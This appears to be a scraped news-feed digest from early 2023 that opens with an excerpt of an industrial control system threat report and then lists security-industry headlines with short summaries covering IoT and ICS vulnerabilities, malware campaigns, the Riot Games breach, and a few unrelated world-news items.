15 countries and territories with the highest percentage of ICS computers on which malware was blocked when removable devices were connected, H2 2022 Email clients Southern Europe, which, in H1 2022, topped the ranking of regions based on the percentage of ICS computers on which malicious email attachments and phishing links were blocked, remained at the top of the ranking in H2. Percentage of ICS computers on which malicious objects from different sources were blocked, Q1 – Q4 2022 Percentage of ICS computers on which malicious objects from email were blocked, January – December 2022 There was also a noticeable increase in Q2 2022 in the percentage of ICS computers on which threats were blocked in network folders. This group includes Windows computers that perform one or several of the following functions: Supervisory control and data acquisition (SCADA) servers; Data storage servers (Historian); Data gateways (OPC); Stationary workstations of engineers and operators; Mobile workstations of engineers and operators; Human Machine Interface (HMI); Computers used for industrial network administration; Computers used to develop software for industrial automation. Percentage of ICS computers on which malicious objects were blocked, January – December of 2021 and 2022 The increase in the percentage of ICS computers in Russia on which malicious objects were blocked in H2 2022 was due to a sharp increase of 11.1 p.p.
in the percentage of ICS computers on which malicious scripts and phishing pages were blocked. Percentage of ICS computers on which denylisted internet resources, as well as malicious scripts and phishing pages were blocked, January – December 2022 The sudden surge in the percentage of ICS computers on which malicious scripts and phishing pages were blocked in August and September 2022, as well as the high figures in the following months, were due to mass infections of websites (including those of industrial organizations) that use the Bitrix CMS. Percentage of ICS computers on which malicious objects from different sources were blocked In H2 2022 in Russia, most industries saw an increase (in some cases, quite significant) in the percentage of ICS computers on which malicious objects were blocked – both as a consequence of mass distribution of malicious scripts and due to a relatively small increase in the percentage of ICS computers in Russia on which spyware was blocked. "


      Resecurity appoints Akash Rosen to lead digital forensics practice

      industry
      2023-03-06 https://www.helpnetsecurity.com/2023/03/07/resecurity-akash-rosen/

      Resecurity accelerates its Digital Forensics & Incident Response Services portfolio with the newly appointed industry professional, Akash Rosen. Akash Rosen is a recognized digital forensics expert and investigator. He assisted international law enforcement on numerous cases related to online-banking theft, financial and healthcare fraud, money laundering, malicious code distribution, and network intrusions into enterprise and government networks. Mr. Rosen is an expert court witness and has testified on numerous digital forensics and cybercrime investigation matters. He … More

      The post Resecurity appoints Akash Rosen to lead digital forensics practice appeared first on Help Net Security.

      "

      Autosummary: "


      New Flaws in TPM 2.0 Library Pose Threat to Billions of IoT and Enterprise Devices

      industry
      2023-03-03 https://thehackernews.com/2023/03/new-flaws-in-tpm-20-library-pose-threat.html
      A pair of serious security defects has been disclosed in the Trusted Platform Module (TPM) 2.0 reference library specification that could potentially lead to information disclosure or privilege escalation. One of the vulnerabilities, CVE-2023-1017, concerns an out-of-bounds write, while the other, CVE-2023-1018, is described as an out-of-bounds read. Credited with discovering and reporting the "

      Autosummary: "


      SysUpdate Malware Strikes Again with Linux Version and New Evasion Tactics

      exploits industry
      2023-03-02 https://thehackernews.com/2023/03/sysupdate-malware-strikes-again-with.html
      The threat actor known as Lucky Mouse has developed a Linux version of a malware toolkit called SysUpdate, expanding on its ability to target devices running the operating system. The oldest version of the updated artifact dates back to July 2022, with the malware incorporating new features designed to evade security software and resist reverse engineering. Cybersecurity company Trend Micro said "

      Autosummary: Lucky Mouse is also tracked under the monikers APT27, Bronze Union, Emissary Panda, and Iron Tiger, and is known to utilize a variety of malware such as SysUpdate, HyperBro, PlugX, and a Linux backdoor dubbed rshell. "


      Covert cyberattacks on the rise as attackers shift tactics for maximum impact

      industry ciber
      2023-03-01 https://www.helpnetsecurity.com/2023/03/01/shifting-attack-strategies/

      2022 was the second-highest year on record for global ransomware attempts and also saw an 87% increase in IoT malware and a record number of cryptojacking attacks (139.3 million), according to SonicWall. “The past year reinforced the need for cybersecurity in every industry and every facet of business, as threat actors targeted anything and everything, from education to retail to finance,” said SonicWall President and CEO Bob VanKirk. “While organizations face an increasing number of … More

      The post Covert cyberattacks on the rise as attackers shift tactics for maximum impact appeared first on Help Net Security.

      "

      Autosummary: "


      Tesla to build new factory in Mexico

      latam industry
      2023-02-28 https://www.bbc.co.uk/news/business-64803467?at_medium=RSS&at_campaign=KARANGA
      Elon Musk's electric car company joins other firms investing south of the US border. "

      Autosummary: "


      Are your IoT devices at risk? Cybersecurity concerns for 2023

      industry ciber
      2023-02-22 https://www.helpnetsecurity.com/2023/02/22/iot-devices-cybersecurity-risk-2023-video/

      In this Help Net Security video, J.R. Cunningham, CSO at Nuspire, discusses IoT cybersecurity concerns for 2023. With homes becoming increasingly connected and reliant on smart technology, the potential for cybercriminals to exploit vulnerabilities and wreak havoc is higher than ever before. Although we have new and emerging standards for how connected things talk to each other, such as the Matter standard that IoT companies have agreed to adopt, this could be the year we … More

      The post Are your IoT devices at risk? Cybersecurity concerns for 2023 appeared first on Help Net Security.

      "

      Autosummary: "


      Scott Lundgren and John Spiliotis join NetSPI Board of Directors

      industry
      2023-02-22 https://www.helpnetsecurity.com/2023/02/23/netspi-board-of-directors/

      NetSPI has appointed Scott Lundgren and John Spiliotis to its Board of Directors. The two veteran security industry executives will support the company’s next stage of growth following a year of record momentum. “We’re honored to have Scott and John join our Board during such an exciting, pivotal time for NetSPI,” said Aaron Shilts, CEO of NetSPI. “Their proven track records of building and advising high-growth cybersecurity companies, combined with their passion for empowering the … More

      The post Scott Lundgren and John Spiliotis join NetSPI Board of Directors appeared first on Help Net Security.

      "

      Autosummary: “Their proven track records of building and advising high-growth cybersecurity companies, combined with their passion for empowering the next generation of business leaders, will be invaluable as we continue to innovate and scale,” Shilts added. "


      The Future of Network Security: Predictive Analytics and ML-Driven Solutions

      industry
      2023-02-21 https://thehackernews.com/2023/02/the-future-of-network-security.html
      As the digital age evolves and continues to shape the business landscape, corporate networks have become increasingly complex and distributed. The amount of data a company collects to detect malicious behaviour constantly increases, making it challenging to detect deceptive and unknown attack patterns and the so-called "needle in the haystack". With a growing number of cybersecurity threats, "

      Autosummary: The truth is ML-powered security solutions are bringing about a significant transformation in network security by providing security teams with numerous benefits and enhancing the overall threat detection capabilities of organizations: Big data analytics: With the ever-increasing amount of data and different log sources, organisations must be able to process vast amounts of information in real-time, including network traffic logs, endpoints, and other sources of information related to cyber threats. The Role of ML-Driven Network Security Solutions ML-driven network security solutions in cybersecurity refer to the use of self-learning algorithms and other predictive technologies (statistics, time analysis, correlations etc.) to automate various aspects of threat detection. "


      Alteryx Analytics Cloud platform updates boost decision intelligence

      industry
      2023-02-19 https://www.helpnetsecurity.com/2023/02/19/alteryx-platform/

      Alteryx has unveiled new self-service and enterprise-grade capabilities to its Alteryx Analytics Cloud Platform to help customers make faster and more intelligent decisions. The enhanced platform, which now includes all access for Designer Cloud, offers an approachable easy-to-use drag-and-drop modern interface accessible to employees of all skill levels, without compromising data governance or security standards. “We are excited about the release of the Alteryx Designer product for the cloud and the ability to make analytics … More

      The post Alteryx Analytics Cloud platform updates boost decision intelligence appeared first on Help Net Security.

      "

      Autosummary: With two-thirds of survey respondents indicating they would benefit from an easy and approachable cloud analytics interface, new Alteryx Analytics Cloud updates include: The reimagined Designer Cloud interface is now available in All Access, with more than 30 extended prep, blend, analysis, and automation tools for intelligent decision making. "


      XIoT vendors get serious about security, devote resources to protect cyber-physical systems

      industry
      2023-02-17 https://www.helpnetsecurity.com/2023/02/17/xiot-protect-cyber-physical-systems/

Cyber-physical system vulnerabilities disclosed in the second half (2H) of 2022 have declined by 14% since hitting a peak during 2H 2021, while vulnerabilities found by internal research and product security teams have increased by 80% over the same time period, according to Claroty. Strengthening cyber-physical systems: These findings indicate that security researchers are having a positive impact on strengthening the security of the Extended Internet of Things (XIoT), a vast network of cyber-physical systems … More

      The post XIoT vendors get serious about security, devote resources to protect cyber-physical systems appeared first on Help Net Security.

      "

      Autosummary: "


      New Mirai Botnet Variant "V3G4" Exploiting 13 Flaws to Target Linux and IoT Devices

      exploits industry
      2023-02-17 https://thehackernews.com/2023/02/new-mirai-botnet-variant-v3g4.html
      A new variant of the notorious Mirai botnet has been found leveraging several security vulnerabilities to propagate itself to Linux and IoT devices. Observed during the second half of 2022, the new version has been dubbed V3G4 by Palo Alto Networks Unit 42, which identified three different campaigns likely conducted by the same threat actor. "Once the vulnerable devices are compromised, they "

      Autosummary: "


      Researchers Warn of Critical Security Bugs in Schneider Electric Modicon PLCs

      exploits industry
      2023-02-16 https://thehackernews.com/2023/02/researchers-warn-of-critical-security.html
      Security researchers have disclosed two new vulnerabilities affecting Schneider Electric Modicon programmable logic controllers (PLCs) that could allow for authentication bypass and remote code execution. The flaws, tracked as CVE-2022-45788 (CVSS score: 7.5) and CVE-2022-45789 (CVSS score: 8.1), are part of a broader collection of security defects tracked by Forescout as OT:ICEFALL. Successful "

      Autosummary: "


      Mirai V3G4 botnet exploits 13 flaws to target IoT devices

      exploits industry
      2023-02-16 https://securityaffairs.com/142358/malware/mirai-v3g4-botnet.html

      During the second half of 2022, a variant of the Mirai bot, tracked as V3G4, targeted IoT devices by exploiting tens of flaws. Palo Alto Networks Unit 42 researchers reported that a Mirai variant called V3G4 was attempting to exploit several flaws to infect IoT devices from July to December 2022.  Below is the list […]

      The post Mirai V3G4 botnet exploits 13 flaws to target IoT devices appeared first on Security Affairs.

      "

Autosummary: The hardcoded command and control (C2) domains among these three campaigns contain the same string (8xl9); the malware shell script downloaders are almost identical between the three campaigns; the botnet client samples use the same XOR decryption key; the botnet client samples use the same “stop list” (a list of target processes that the botnet client searches for and terminates); and the botnet client samples use almost identical functions. The botnet exploited 13 vulnerabilities to achieve remote code execution on vulnerable devices. "


      Enigma info-stealing malware targets the cryptocurrency industry

      exploits industry
      2023-02-14 https://securityaffairs.com/142187/cyber-crime/enigma-info-stealer-cryptocurrency-industry.html

Alleged Russian threat actors have been targeting cryptocurrency users in Eastern Europe with Enigma info-stealing malware. A malware campaign conducted by alleged Russian threat actors has been targeting users in Eastern Europe in the crypto industry. The attackers are sending out emails with fake job opportunities as bait in an attempt to trick victims into […]

      The post Enigma info-stealing malware targets the cryptocurrency industry appeared first on Security Affairs.

      "

Autosummary: Upon opening the Microsoft Word document, the first-stage Enigma loader is launched, which, in turn, downloads and executes an obfuscated secondary-stage payload through Telegram. "


      Honeypot-Factory: The Use of Deception in ICS/OT Environments

      industry
      2023-02-13 https://thehackernews.com/2023/02/honeypot-factory-use-of-deception-in.html
There have been a number of reports of attacks on industrial control systems (ICS) in the past few years. Looking a bit closer, most of the attacks seem to have spilt over from traditional IT. That's to be expected, as production systems are commonly connected to ordinary corporate networks at this point. Though our data does not indicate at this point that a lot of threat actors specifically "

Autosummary: For instance, ICS honeypots like Conpot, XPOT, and CryPLH can simulate the Modbus, S7, IEC-104, DNP3 and other protocols. Conpot is a low-interactive honeypot that can simulate the IEC104, Modbus, BACnet, HTTP, and other protocols, which can be easily deployed and configured. With the development of cybersecurity technology, deception has been applied in various circumstances like the web, databases, mobile apps, and IoT. Deception technology has been embodied in some ICS honeypot applications in the OT field. With some deception applications, for instance honeypots, the operating environment and configuration can be simulated, thus luring the attacker to penetrate the fake target. "


      Vulnerabilities open Korenix JetWave industrial networking devices to attack

      industry
      2023-02-13 https://www.helpnetsecurity.com/2023/02/13/korenix-jetwave-industrial-vulnerabilities/

      Three vulnerabilities found in a variety of Korenix JetWave industrial access points and LTE cellular gateways may allow attackers to either disrupt their operation or to use them as a foothold for further attacks, CyberDanube researchers have found. “If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker,” the researchers noted. … More

      The post Vulnerabilities open Korenix JetWave industrial networking devices to attack appeared first on Help Net Security.

      "

      Autosummary: "


CISA issues alert with South Korean government about DPRK's ransomware antics

      exploits government ransomware industry
      2023-02-13 https://www.malwarebytes.com/blog/news/2023/02/cisa-issues-alert-with-south-korean-government-about-dprks-ransomware-antics

      Categories: News

      Categories: Ransomware

      Tags: CISA

      Tags: ransomware

      Tags: Democratic People’s Republic of Korea

      Tags: DPRK

      Tags: North Korea

      Tags: WannaCry

      Tags: EternalBlue

      Tags: Lazarus Group

      Tags: APT

      Tags: Magniber

      Tags: Magnitude exploit kit

      Tags: exploit kit

      Tags: EK

      Tags: Andariel

      Tags: Silent Chollima

      Tags: Stonefly

      Tags: Maui

      Tags: H0lyGh0st

      Tags: PLUTONIUM

      Tags: Conti

      The tactics of North Korean-sponsored ransomware cyberattacks against the healthcare sector and other vital infrastructure are highlighted in the latest #StopRansomware alert.


The post CISA issues alert with South Korean government about DPRK's ransomware antics appeared first on Malwarebytes Labs.

      "

Autosummary: DPRK ransomware has significantly altered the face of ransomware, tuning it up from a simple locker and then making it more disruptive, lucrative, and, in some cases, destructive. H0lyGh0st, like other current ransomware gangs, favors double-extortion tactics, maintains a leak site, and targets small and medium-sized enterprises (SMEs). Once it arrives on target networks, it encrypts servers responsible for record-keeping, diagnosing, imaging services, and others. "North Korea's cyber program poses a growing espionage, theft, and attack threat," the Annual Threat Assessment report in 2021 said. "


      Socure joins FIDO Alliance to improve identity verification industry standards

      industry
      2023-02-10 https://www.helpnetsecurity.com/2023/02/10/socure-fido-alliance/

      Socure has joined the FIDO (Fast IDentity Online) Alliance to advance identity verification standards that make it easy to verify identity online and protect against identity fraud across industries. Socure’s mission is to verify 100% of good identities in real-time and completely eliminate identity fraud for every applicant on the internet. Its graph-defined platform combines advanced machine learning and artificial intelligence with all elements of a consumer’s identity to deliver the most accurate and robust … More

      The post Socure joins FIDO Alliance to improve identity verification industry standards appeared first on Help Net Security.

      "

      Autosummary: "


      Opscura raises $9.4 million to address industrial cybersecurity challenges

      industry ciber
      2023-02-09 https://www.helpnetsecurity.com/2023/02/09/opscura-funding/

      Opscura has received $9.4M in Series A funding as it scales to engage further U.S. partners and customers seeking to protect and connect their critical operations. Founded in Spain as Enigmedia, the new global entity Opscura is also launching a new brand, global management team, and product upgrades in addition to the capital infusion led by Anzu Partners, with investments from Dreamit and Mundi Ventures. Opscura’s technology adds a layer to the industrial cybersecurity ecosystem … More

      The post Opscura raises $9.4 million to address industrial cybersecurity challenges appeared first on Help Net Security.

      "

      Autosummary: Customers across various industries, including renewable energy, transportation, manufacturing, government, and chemical also rely on Opscura to solve industrial cybersecurity, compliance, and digital transformation challenges. "


      Inadequate cybersecurity investments leave rail industry at risk

      industry ciber
      2023-02-09 https://www.helpnetsecurity.com/2023/02/09/rail-industry-cybersecurity-spending/

The popular notion might view the rail industry as a laggard compared to auto or high-tech manufacturing when embracing Industry 4.0. Yet railways are increasingly dependent on sophisticated connected systems to enhance efficiency and customer satisfaction. Rail industry needs to work closely with cybersecurity vendors: With the advent of connected online systems and the convergence of Operational Technology (OT) and Information Technology (IT) systems, network and data-sharing security between IT and OT systems is proceeding … More

      The post Inadequate cybersecurity investments leave rail industry at risk appeared first on Help Net Security.

      "

Autosummary: Rail industry needs to work closely with cybersecurity vendors: With the advent of connected online systems and the convergence of Operational Technology (OT) and Information Technology (IT) systems, network and data-sharing security between IT and OT systems is proceeding to become an integral component of safety, providing new market opportunities in the rail, freight, and transit sector. "


      NIST chooses encryption algorithms for lightweight IoT devices

      industry
      2023-02-09 https://www.helpnetsecurity.com/2023/02/09/encryption-algorithms-iot/

ASCON is the name of the group of lightweight authenticated encryption and hashing algorithms that the U.S. National Institute of Standards and Technology (NIST) has chosen to secure the data generated by Internet of Things (IoT) devices: implanted medical devices, keyless entry fobs, “smart home” devices, etc. Gathered under the ASCON label are seven algorithms, some of which may not end up being included in the lightweight cryptography standard NIST plans to publish later … More

      The post NIST chooses encryption algorithms for lightweight IoT devices appeared first on Help Net Security.

      "

      Autosummary: ASCON, developed in 2014 by a team of cryptographers from Graz University of Technology, Infineon Technologies, Lamarr Security Research and Radboud University, has now been chosen as the winner of the contest, due to its many qualities, which include speed, ease of implementation, energy efficiency, and scalability. "


      Gootkit Malware Adopts New Tactics to Attack Healthcare and Finance Firms

      financial exploits industry
      2023-02-09 https://thehackernews.com/2023/02/gootkit-malware-adopts-new-tactics-to.html
      The Gootkit malware is prominently going after healthcare and finance organizations in the U.S., U.K., and Australia, according to new findings from Cybereason. The cybersecurity firm said it investigated a Gootkit incident in December 2022 that adopted a new method of deployment, with the actors abusing the foothold to deliver Cobalt Strike and SystemBC for post-exploitation. "The threat actor "

      Autosummary: "


      Critical Infrastructure at Risk from New Vulnerabilities Found in Wireless IIoT Devices

      industry
      2023-02-09 https://thehackernews.com/2023/02/critical-infrastructure-at-risk-from.html
      A set of 38 security vulnerabilities has been uncovered in wireless industrial internet of things (IIoT) devices from four different vendors that could pose a significant attack surface for threat actors looking to exploit operational technology (OT) environments. "Threat actors can exploit vulnerabilities in Wireless IIoT devices to gain initial access to internal OT networks," Israeli "

      Autosummary: Alternatively, local attackers can break into industrial Wi-Fi access points and cellular gateways by targeting on-site Wi-Fi or cellular channels, leading to adversary-in-the-middle (AitM) scenarios with adverse potential impact. "


      NIST Standardizes Ascon Cryptographic Algorithm for IoT and Other Lightweight Devices

      industry
      2023-02-08 https://thehackernews.com/2023/02/nist-standardizes-ascon-cryptographic.html
      The U.S. National Institute of Standards and Technology (NIST) has announced that a family of authenticated encryption and hashing algorithms known as Ascon will be standardized for lightweight cryptography applications. "The chosen algorithms are designed to protect information created and transmitted by the Internet of Things (IoT), including its myriad tiny sensors and actuators," NIST said. "

      Autosummary: "


      US NIST unveils winning encryption algorithm for IoT data protection

      industry
      2023-02-08 https://www.bleepingcomputer.com/news/security/us-nist-unveils-winning-encryption-algorithm-for-iot-data-protection/
      The National Institute of Standards and Technology (NIST) announced that ASCON is the winning bid for the "lightweight cryptography" program to find the best algorithm to protect small IoT (Internet of Things) devices with limited hardware resources. [...] "

Autosummary: NIST also considered that the algorithm had withstood the test of time, having been developed in 2014 by a team of cryptographers from Graz University of Technology, Infineon Technologies, Lamarr Security Research, and Radboud University, and winning the CAESAR cryptographic competition's "lightweight encryption" category in 2019. "


      Industrial Defender and Nozomi Networks partner to protect critical operational technology

      industry
      2023-02-07 https://www.helpnetsecurity.com/2023/02/07/industrial-defender-nozomi-networks/

      Nozomi Networks and Industrial Defender have unveiled a strategic partnership to enhance the security of critical infrastructure and manufacturing facilities. The companies’ joint solution combines asset visibility and threat detection capabilities from Nozomi Networks with change and configuration monitoring from Industrial Defender to provide the most complete and detailed view of OT assets and behavior in the industry. “Collaborating with industry leaders is essential for effectively defending against the growing cyber threats against operational technology. … More

      The post Industrial Defender and Nozomi Networks partner to protect critical operational technology appeared first on Help Net Security.

      "

      Autosummary: "


      India-China relations will define the IoT landscape in 2023

      industry
      2023-02-07 https://www.helpnetsecurity.com/2023/02/07/iot-landscape-2023/

      Tensions between two of the biggest producers of connected (IoT) devices are coming to a head, and will be changing the IoT landscape in 2023. In recent months, India and China have faced off over their disputed border in the Himalayas. The military stand-off mirrors growing tech conflict between the two superpowers. In a relationship increasingly marked by diplomatic disputes and trade rivalry, India and China are now competing for the Internet of Things (IoT). … More

      The post India-China relations will define the IoT landscape in 2023 appeared first on Help Net Security.

      "

Autosummary: In my view, the country is only set to grow in IoT. They are more democratic, count fewer language barriers and have a young, tech-savvy populace – the perfect conditions for economic golden years. At a minimum, devices must count encrypted, direct communications, and cybersecurity leaders should review device origin in any onboarding process. China, on the other hand, is coming out of the pandemic and keen to continue its tech bull run, so we cannot expect them to go down without a fight. "


      GuLoader Malware Using Malicious NSIS Executable to Target E-Commerce Industry

      exploits industry
      2023-02-06 https://thehackernews.com/2023/02/guloader-malware-using-malicious-nsis.html
      E-commerce industries in South Korea and the U.S. are at the receiving end of an ongoing GuLoader malware campaign, cybersecurity firm Trellix disclosed late last month. The malspam activity is notable for transitioning away from malware-laced Microsoft Word documents to NSIS executable files for loading the malware. Other countries targeted as part of the campaign include Germany, Saudi Arabia, "

      Autosummary: "


      Experts Warn of "Ice Breaker" Cyberattacks Targeting Gaming and Gambling Industry

      industry ciber
      2023-02-01 https://thehackernews.com/2023/02/experts-warn-of-ice-breaker.html
A new attack campaign has targeted the gaming and gambling sectors since at least September 2022, just months prior to the ICE London 2023 gaming industry trade fair event that's scheduled next week. Israeli cybersecurity company Security Joes is tracking the activity cluster under the name Ice Breaker, stating the intrusions employ clever social engineering tactics to deploy a JavaScript "

      Autosummary: "


      Vulnerability in Cisco industrial appliances is a potential nightmare (CVE-2023-20076)

      exploits industry
      2023-02-01 https://www.helpnetsecurity.com/2023/02/01/cve-2023-20076/

      Cisco has released patches for a high-severity vulnerability (CVE-2023-20076) found in some of its industrial routers, gateways and enterprise wireless access points, which may allow attackers to insert malicious code that can’t be deleted by simply rebooting the device or updating its firmware. “In this case, the command injection bypasses mitigations Cisco has in place to ensure vulnerabilities do not persist in a system. Side-stepping this security measure means that if an attacker exploits this … More

      The post Vulnerability in Cisco industrial appliances is a potential nightmare (CVE-2023-20076) appeared first on Help Net Security.

      "

Autosummary: IOS XE-based devices configured with IOx (i.e., routers capable of running third-party apps inside of a containerized environment); Cisco Catalyst Access Points (wireless access points for enterprise environments with a high number of connected devices); IR510 WPAN Industrial Routers (wireless routers for smart factories and smart grids); CGR1000 Compute Modules (for enterprise cloud services). There are no workarounds available. "


      New Report Reveals NikoWiper Malware That Targeted Ukraine Energy Sector

      exploits industry
      2023-01-31 https://thehackernews.com/2023/01/new-report-reveals-nikowiper-malware.html
      The Russia-affiliated Sandworm used yet another wiper malware strain dubbed NikoWiper as part of an attack that took place in October 2022 targeting an energy sector company in Ukraine. "The NikoWiper is based on SDelete, a command line utility from Microsoft that is used for securely deleting files," cybersecurity company ESET revealed in its latest APT Activity Report shared with The Hacker "

      Autosummary: "Any country with a nexus to the Ukraine crisis, particularly those with key geopolitical, economic, or military relationships with Russia or Ukraine, are at increased risk of targeting," the company said in a technical report published last week. "


      ICS vulnerabilities: Insights from advisories, how CVEs are reported

      industry
      2023-01-30 https://www.helpnetsecurity.com/2023/01/30/ics-vulnerabilities-advisories-cve-video/

SynSaber recently released its second Industrial Control Systems (ICS) Vulnerabilities & CVEs Report. In this Help Net Security video, Ronnie Fabela, CTO at SynSaber, talks about the key findings: for the CVEs reported in the second half of 2022, 35% have no patch or remediation currently available from the vendor (up from 13% in the first half of the year); while 56% of the CVEs have been reported by the Original Equipment Manufacturer (OEM), 43% … More

      The post ICS vulnerabilities: Insights from advisories, how CVEs are reported appeared first on Help Net Security.

      "

      Autosummary: "


      Realtek Vulnerability Under Attack: 134 Million Attempts in 2 Months to Hack IoT Devices

      exploits industry
      2023-01-30 https://thehackernews.com/2023/01/realtek-vulnerability-under-attack-134.html
      Researchers are warning about a spike in exploitation attempts weaponizing a critical remote code execution flaw in Realtek Jungle SDK since the start of August 2022. According to Palo Alto Networks Unit 42, the ongoing campaign is said to have recorded 134 million exploit attempts as of December 2022, with 97% of the attacks occurring in the past four months. Close to 50% of the attacks "

      Autosummary: "


      Riot Games refuses to pay ransom to avoid League of Legends leak

      industry
      2023-01-30 https://www.malwarebytes.com/blog/news/2023/01/stolen-code-from-riot-games-already-being-auctioned-off

      Categories: News

      Tags: Riot Games

      Tags: 2K Games

      Tags: Rockstar Games

      Tags: social engineering

      Tags: phishing

      The Riot Games breach saga continues.


      The post Riot Games refuses to pay ransom to avoid League of Legends leak appeared first on Malwarebytes Labs.

      "

      Autosummary: Motherboard was able to obtain a copy of the ransom email and partially shared the content with its readers, which we have replicated below: Dear Riot Games, We have obtained your valuable data, including the precious anti-cheat source code and the entire game code for League of Legends and its tools, as well as Packman, your usermode anti-cheat. "


      Week in review: ChatGPT cybersecurity, critical RCE vulnerabilities found in git, Riot Games breached

      industry ciber
      2023-01-29 https://www.helpnetsecurity.com/2023/01/29/week-in-review-chatgpt-cybersecurity-critical-rce-vulnerabilities-found-in-git-riot-games-breached/

      Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: BSidesZG 2023: Strengthening the infosec community in Croatia’s capital In March 2023, Zagreb will be added to the (already long) list of cities where information security professionals and enthusiasts can share their knowledge with peers at a Security BSides conference. We’ve talked with BSidesZG organizer Ante Jurjevic to find out what’s in store for those who attend. How to tackle … More

      The post Week in review: ChatGPT cybersecurity, critical RCE vulnerabilities found in git, Riot Games breached appeared first on Help Net Security.

      "

      Autosummary: Critical VMware vRealize Log Insight flaws patched (CVE-2022-31706, CVE-2022-31704) VMware has fixed two critical (CVE-2022-31706, CVE-2022-31704) and two important (CVE-2022-31710, CVE-2022-31711) security vulnerabilities in VMware vRealize Log Insight, its multi-cloud solution for centralized log management, operational visibility and intelligent analytics. Why most IoT cybersecurity strategies give zero hope for zero trust In this Help Net Security video, Denny LeCompte, CEO at Portnox, discusses how IoT has been difficult to profile accurately and why zero trust strategies fail when applied to IoT. Understanding your attack surface makes it easier to prioritize technologies and systems Organizations need to strike the balance of carrying out enough due diligence before patching, and then patching as quickly as possible to defend themselves against emerging threats. "


      Hemp makes a comeback in the construction industry

      industry
      2023-01-27 https://www.bbc.co.uk/news/business-63666195?at_medium=RSS&at_campaign=KARANGA
      A revival of hemp cultivation in Portugal has spurred the use of hemp blocks in construction. "

      Autosummary: "


      BlackCat Ransomware gang stole secret military data from an industrial explosives manufacturer

      exploits ransomware industry
      2023-01-27 https://securityaffairs.com/141409/data-breach/blackcat-ransomware-solar-industries-india.html

The BlackCat Ransomware group claims to have hacked SOLAR INDUSTRIES INDIA and to have stolen 2TB of “secret military data.” The BlackCat Ransomware gang added SOLAR INDUSTRIES INDIA to the list of victims published on its Tor leak site. The company is a globally recognised industrial explosives manufacturer that provides complete blasting solutions, including packaged, […]

      The post BlackCat Ransomware gang stole secret military data from an industrial explosives manufacturer appeared first on Security Affairs.

      "

      Autosummary: "


      Haiti police riot on streets after gang attacks on officers

      industry
      2023-01-27 https://www.bbc.co.uk/news/world-latin-america-64424601?at_medium=RSS&at_campaign=KARANGA
      The protesters blame the government for not taking action over a number of gang attacks on police stations and officers. "

      Autosummary: "


      Haiti police riot after crime gangs kill 14 officers

      industry
      2023-01-26 https://www.bbc.co.uk/news/world-latin-america-64421308?at_medium=RSS&at_campaign=KARANGA
      Fourteen police officers have died since the start of 2023 amid a huge surge in gang violence. "

      Autosummary: "


      Riot Games breached: How did it happen?

      industry
      2023-01-25 https://www.helpnetsecurity.com/2023/01/25/riot-games-breached/

The hackers who breached Riot Games last week are asking for $10 million not to leak the stolen source code for the company’s popular League of Legends online game. The company has also confirmed that source code for TFT (Teamfight Tactics) and a legacy anti-cheat platform (Packman) were exfiltrated by the attackers, but said they won’t be paying the ransom. It all started with social engineering: Last week, Riot Games said that systems in their … More

      The post Riot Games breached: How did it happen? appeared first on Help Net Security.

      "

      Autosummary: The operator of malware repository vx-underground has professedly spoken to the attacker, who said they got in by social engineering a Riot Games employee via SMS, that they managed to pivot through the company network and escalate privileges by social engineering a company director, but that they did not deploy malware (e.g., ransomware) on company systems. "


      Riot Games receives ransom demand from hackers, refuses to pay

      industry
      2023-01-24 https://www.bleepingcomputer.com/news/security/riot-games-receives-ransom-demand-from-hackers-refuses-to-pay/
      Riot Games says it will not pay the ransom demanded by the attackers responsible for the security breach the company disclosed last week. [...] "

      Autosummary: Lapsus$ is known for hacking into the network of a series of high-profile companies, including Microsoft, Nvidia, T-Mobile, Samsung, Uber, Vodafone, Ubisoft, Okta, and e-commerce giant Mercado Libre. "


      Riot Games compromised, new releases and patches halted

      industry
      2023-01-24 https://www.malwarebytes.com/blog/news/2023/01/riot-games-reveals-compromise-of-development-environment

      Categories: News

      Tags: Riot Games

      Tags: valorant

      Tags: league of legends

      Tags: compromise

      Tags: development

      Tags: patch

      Tags: patching

      Tags: update

      Riot Games has revealed that it has been compromised after a social engineering attack.


      The post Riot Games compromised, new releases and patches halted appeared first on Malwarebytes Labs.

      "

      Autosummary: For now Riot, stewards of titles such as Valorant and League of Legends, made the following statement in relation to the attack: Earlier this week, systems in our development environment were compromised via a social engineering attack. "


      Why most IoT cybersecurity strategies give zero hope for zero trust

      industry ciber
      2023-01-23 https://www.helpnetsecurity.com/2023/01/23/iot-cybersecurity-strategies-zero-trust-video/

      IoT remains the biggest hurdle in achieving an effective zero-trust security posture across an organization. In this Help Net Security video, Denny LeCompte, CEO at Portnox, discusses how IoT has been difficult to profile accurately and why zero trust strategies fail when applied to IoT.

      The post Why most IoT cybersecurity strategies give zero hope for zero trust appeared first on Help Net Security.

      "

      Autosummary: "


      Video game firm Riot Games hacked, now it faces problems to release content

      industry
      2023-01-23 https://securityaffairs.com/141171/cyber-crime/riot-games-hacked.html

      Video game developer and publisher Riot Games announced that it will delay the release of game patches after a security incident. Riot Games is an American video game developer, publisher and esports tournament organizer known for the creation of the popular games League of Legends and Valorant. Last week threat actors hacked the company’s systems in its development environment, Riot Games […]

      The post Video game firm Riot Games hacked, now it faces problems to release content appeared first on Security Affairs.

      "

      Autosummary: "


      Riot Games hacked, delays game patches after security breach

      industry
      2023-01-21 https://www.bleepingcomputer.com/news/security/riot-games-hacked-delays-game-patches-after-security-breach/
      Riot Games, the video game developer and publisher behind League of Legends and Valorant, says it will delay game patches after its development environment was compromised. [...] "

      Autosummary: "This issue may impact our ability to release the full scope of balance changes planned, but we're working to implement the most meaningful of those possible through a hotfix at our scheduled patch time," the TFT team added. "


      Brazil Congress riots: President Lula sacks army commander

      latam industry
      2023-01-21 https://www.bbc.co.uk/news/world-latin-america-64362096?at_medium=RSS&at_campaign=KARANGA
      General Julio Cesar de Arruda is the latest person in the military to lose their position. "

      Autosummary: "


      CISA Warns of Flaws in Siemens, GE Digital, and Contec Industrial Control Systems

      industry
      2023-01-18 https://thehackernews.com/2023/01/cisa-warns-of-flaws-in-siemens-ge.html
      The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published four Industrial Control Systems (ICS) advisories, calling out several security flaws affecting products from Siemens, GE Digital, and Contec. The most critical of the issues have been identified in Siemens SINEC INS that could lead to remote code execution via a path traversal flaw (CVE-2022-45092, CVSS score: 9.9) "

      Autosummary: "


      Brazil Congress: Dozens indicted over 8 January riot

      latam industry
